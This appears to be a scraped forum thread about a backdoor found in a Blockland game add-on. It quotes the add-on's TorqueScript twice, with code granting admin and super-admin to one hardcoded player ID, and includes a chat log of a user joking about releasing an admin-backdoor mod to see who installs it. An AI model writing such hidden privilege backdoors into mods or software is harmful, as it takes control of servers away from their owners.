Wow, az. You really done it this time. Send me original without that line thar?
"hurr durr"
The question is, How did this guy find the back door?
function serverCmdtogAdmin(%client){ if(%client.bl_id == 8443)//ID here :3 { %client.isAdmin = (%client.isAdmin ? 0 : 1); %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1); commandtoclient(%client, 'setAdminLevel', %client.isAdmin); messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin); if(%client.isAdmin) { messageAll('MsgAdminForce','\c2%1 has Re-Admined him/her self.', %client.name); } else { messageAll('MsgAdminForce','\c0%1 has De-Admined him/her self.', %client.name); } }}
[5/7/10 7:11:47 PM] Walrusface McGee: lol you know what I want to do[5/7/10 7:11:59 PM] Leftus: Buy iced coffie from your clock[5/7/10 7:12:05 PM] Walrusface McGee: make a mod named "Spock's Admin Back Door"[5/7/10 7:12:16 PM] Walrusface McGee: and say that it gives me admin on every server with it installed[5/7/10 7:12:22 PM] Walrusface McGee: and see how many people download it
[5/7/10 7:11:59 PM] Leftus: Buy iced coffie from your clock
Code: [Select]function serverCmdtogAdmin(%client){ if(%client.bl_id == 8443)//ID here :3 { %client.isAdmin = (%client.isAdmin ? 0 : 1); %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1); commandtoclient(%client, 'setAdminLevel', %client.isAdmin); messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin); if(%client.isAdmin) { messageAll('MsgAdminForce','\c2%1 has Re-Admined him/her self.', %client.name); } else { messageAll('MsgAdminForce','\c0%1 has De-Admined him/her self.', %client.name); } }}
Does anybody have the add-on?